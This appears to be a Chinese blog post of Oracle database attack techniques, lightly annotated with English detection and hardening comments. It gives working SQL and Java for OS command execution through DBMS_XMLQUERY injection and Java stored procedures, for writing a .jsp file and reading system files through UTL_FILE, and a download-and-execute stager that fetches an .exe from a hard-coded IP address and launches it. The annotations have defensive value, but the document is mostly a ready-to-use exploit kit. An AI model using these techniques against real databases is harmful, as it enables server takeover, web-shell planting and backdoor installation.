
oracle的一些小姿势

2020-09-20 08:55


1.执行系统命令
-- The first two statements each pass DBMS_XMLQUERY.NEWCONTEXT a string that is
-- itself an anonymous PL/SQL block (PRAGMA AUTONOMOUS_TRANSACTION wrapping an
-- EXECUTE IMMEDIATE), so a grant and a CREATE FUNCTION are attempted from
-- inside an ordinary SELECT.
-- NOTE(review): the page does not state which Oracle releases or which caller
-- privileges this depends on; presumably the inner block runs with the
-- caller's rights. Confirm on the version under assessment.
-- Hardening: revoke EXECUTE on DBMS_XMLQUERY from PUBLIC where it is not needed.
-- Detection: audit calls to DBMS_XMLQUERY.NEWCONTEXT whose argument is PL/SQL
-- text rather than a query.

-- Statement 1: the inner block calls DBMS_JAVA.GRANT_PERMISSION to give SYSTEM
-- java.io.FilePermission on <<ALL FILES>> with the EXECUTE action.
-- Detection: review DBA_JAVA_POLICY for FilePermission rows on <<ALL FILES>>.
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;

-- Statement 2: the inner block creates function QaxRunCMD2(p_cmd varchar2) as a
-- Java call specification bound to LinxUtil.runCMD. The LinxUtil Java class is
-- not defined anywhere on this page, so the function only resolves if that
-- class already exists in the database.
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function QaxRunCMD2(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD((java.lang.String) return String''''; '';commit;end;') from dual;

-- Statement 3: calls the function with the OS command 'whoami'.
-- Detection: process-creation telemetry showing the database server process
-- spawning a shell or whoami is a strong indicator of this technique.
select QaxRunCMD2('whoami') from dual;
2.oracle写文件
-- Creates (or replaces) the directory object IST0_DIR mapped to the drive root
-- C:\ and grants READ and WRITE on it. 用户 ("user") is the author's
-- placeholder for the grantee account name.
-- CREATE OR REPLACE DIRECTORY requires the CREATE ANY DIRECTORY privilege.
-- Hardening: restrict CREATE ANY DIRECTORY to DBAs.
-- Detection: review DBA_DIRECTORIES for objects that map to a drive root, a
-- web root or an OS system path, and audit grants on directory objects.
create or replace directory IST0_DIR as 'C:\';

grant read, write on directory IST0_DIR to 用户;

-- Anonymous block that opens kj021320.jsp for writing through the IST0_DIR
-- directory object, flushes and closes it. No write call appears between fopen
-- and fclose, so as shown only the file itself is created or truncated.
-- The file is created by the OS account that runs the database server.
-- Detection: a .jsp (or other script) file created by the database service
-- account, especially under a web-served path, is a web-shell indicator;
-- file-integrity monitoring on web roots catches it.
-- Hardening: limit EXECUTE on UTL_FILE (check DBA_TAB_PRIVS) and keep
-- directory objects away from web roots.
declare

isto_file utl_file.file_type;

begin

-- 'W' opens the file in write mode.
isto_file := utl_file.fopen('IST0_DIR', 'kj021320.jsp', 'W');

utl_file.fflush(isto_file);

utl_file.fclose(isto_file);

end;
3.oracle读文件
-- Re-points the directory object IST0_DIR at a Windows system folder; because
-- of OR REPLACE any earlier mapping of the same name is overwritten.
-- Detection: changes to existing rows in DBA_DIRECTORIES, and directory
-- objects that resolve to OS system paths, deserve review.
create or replace directory IST0_DIR as 'C:\Windows\System32\zh-CN\';

-- Anonymous block that reads up to 32767 bytes of winver.exe.mui through the
-- IST0_DIR directory object and prints the buffer with DBMS_OUTPUT.
-- The read happens as the OS account that runs the database server, so any
-- file that account can read is reachable once a directory object points at it.
-- Hardening: limit EXECUTE on UTL_FILE (check DBA_TAB_PRIVS) and restrict who
-- can create or be granted READ on directory objects.
declare

isto_file utl_file.file_type;

-- Receives the raw bytes read from the file.
fp_buffer RAW(32767);

begin

-- 'R' opens for reading; 32767 is passed as the maximum line size.
isto_file := utl_file.fopen('IST0_DIR', 'winver.exe.mui', 'R',32767); -- OS version information

utl_file.get_raw (isto_file , fp_buffer,32767 );

-- NOTE(review): fp_buffer is RAW; presumably it is rendered as hex through
-- implicit conversion when passed to put_line. Confirm.
dbms_output.put_line(fp_buffer);

utl_file.fclose(isto_file);

end;
4.oracle plsqldev.exe 执行命令-->原理执行java代码调用系统命令,界面画f8
4.1创建java源码

-- Stores and compiles a Java source object named Test inside the database.
-- Its single static method passes its argument to Runtime.exec, so the command
-- runs as the OS account of the database server process.
-- In the Oracle JVM, Runtime.exec needs java.io.FilePermission with the
-- execute action, granted through DBMS_JAVA.GRANT_PERMISSION.
-- Detection: list JAVA SOURCE / JAVA CLASS objects in DBA_OBJECTS that are not
-- owned by Oracle-maintained schemas, and review DBA_JAVA_POLICY for
-- FilePermission execute grants.
-- Hardening: withhold those Java permissions and CREATE PROCEDURE from
-- application accounts that do not need them.
create or replace and compile java source named Test as

import java.io.*;

public class Test

{

// Runs cmd as a child process and echoes its standard output line by line.
// Only stdout is read; the error stream and the exit status are not consumed.
public static void entry(String cmd) throws Exception

{

Process process = Runtime.getRuntime().exec(cmd);

InputStream in = process.getInputStream();

BufferedReader br = new BufferedReader(new InputStreamReader(in));

String line = br.readLine();

while(line!=null) {

// System.out inside the Oracle JVM reaches the client only after it has been
// redirected with DBMS_JAVA.SET_OUTPUT.
System.out.println(line);

line = br.readLine();

}

}

}
4.2.创建存储过程


-- Call specification: publishes the static Java method Test.entry(String) as
-- the PL/SQL procedure cmd, so any account with EXECUTE on cmd can pass it a
-- string that ends up in Runtime.exec.
-- Detection: look in DBA_OBJECTS / DBA_SOURCE for procedures and functions
-- declared "as language java" that were not installed by the application.
create or replace procedure cmd(p_str in varchar2)
as language java
name 'Test.entry(java.lang.String)';

4.3设置输出长度(SQL*Plus)
-- Client-side SQL*Plus setting: show DBMS_OUTPUT text, with a 5000-byte buffer.
set serveroutput on size 5000;

-- Redirects Java System.out in this session to the DBMS_OUTPUT buffer (5000
-- bytes), which is how output from a Java stored procedure reaches the client.
call dbms_java.set_output(5000);

4.4运行存储过程
-- EXEC is SQL*Plus shorthand for an anonymous block; this calls procedure cmd
-- with the OS command 'whoami', whose output names the account the database
-- server runs as.
-- Detection: the database server process spawning child processes such as
-- whoami or a command shell is abnormal on most hosts and worth alerting on.
EXEC cmd('whoami'); 
4.5直接下载执行后门
import java.lang.*;

import java.io.*;

import java.net.*;

import java.util.*;



// Download-and-execute stager meant to be loaded as a Java class (the author
// left the standalone main() signature commented out). It fetches a binary
// over plain HTTP, saves it to disk and starts it.
// Inside the Oracle JVM the outbound connection needs java.net.SocketPermission
// and the write/execute steps need java.io.FilePermission; both show up in
// DBA_JAVA_POLICY when granted.
// Mitigation: database hosts should have no general outbound HTTP egress.
// Detection: outbound HTTP from the database server process, a new executable
// written by it, and a child cmd process are all high-signal events.
public class Hello

{

// Entry point: downloads the file named by the hard-coded URL to c:\ and runs it.
// The URL, file name and token values are the author's placeholders.
public static void entry() throws Exception

//public static void main(String[] args) throws Exception

{

try

{

String url="http://1.1.1.1:4321/xxx.exe";

String token="xxxxxxxxxxxxxxxxxxxxxxxxx";

Hello.downLoadFromUrl(url,"xxx.exe","c:\\",token);

System.out.println("下载完成");

// Launches the saved file through cmd /k; the returned Process is neither
// waited on nor read.
Process process = Runtime.getRuntime().exec("cmd /k c:\\xxx.exe");

// Only IOException is handled here; anything else propagates to the caller.
} catch (java.io.IOException e) {

System.out.println(e);

}



}





// Fetches urlStr over HTTP and writes the response body to savePath/fileName,
// creating savePath if it does not exist.
// The fourth parameter (toekn) is accepted but never used in this method.
// Throws IOException on connection, read or write failure; the streams are
// closed only on the success path.
public static void downLoadFromUrl(String urlStr,String fileName,String savePath,String toekn) throws IOException

{

URL url = new URL(urlStr);

HttpURLConnection conn = (HttpURLConnection)url.openConnection();

// Connect timeout of 3 seconds; no read timeout is set.
conn.setConnectTimeout(3*1000);

// Fixed legacy User-Agent string; an outbound request from a database host
// carrying it is a usable network detection point.
conn.setRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)");

InputStream inputStream = conn.getInputStream();

// The whole response is buffered in memory before anything is written.
byte[] getData = readInputStream(inputStream);

File saveDir = new File(savePath);

if(!saveDir.exists()){

saveDir.mkdir();

}

File file = new File(saveDir+File.separator+fileName);

FileOutputStream fos = new FileOutputStream(file);

fos.write(getData);

if(fos!=null){

fos.close();

}

if(inputStream!=null){

inputStream.close();

}

System.out.println("info:"+url+" download success");



}



// Reads inputStream to end-of-stream in 1024-byte chunks and returns all bytes
// read as a single array. Does not close inputStream.
public static byte[] readInputStream(InputStream inputStream) throws IOException

{

byte[] buffer = new byte[1024];

int len = 0;

ByteArrayOutputStream bos = new ByteArrayOutputStream();

// read() returns -1 at end of stream.
while((len = inputStream.read(buffer)) != -1) {

bos.write(buffer, 0, len);

}

bos.close();

return bos.toByteArray();

}

}
TCV=666

知识来源: https://www.t00ls.net/articles-57941.html
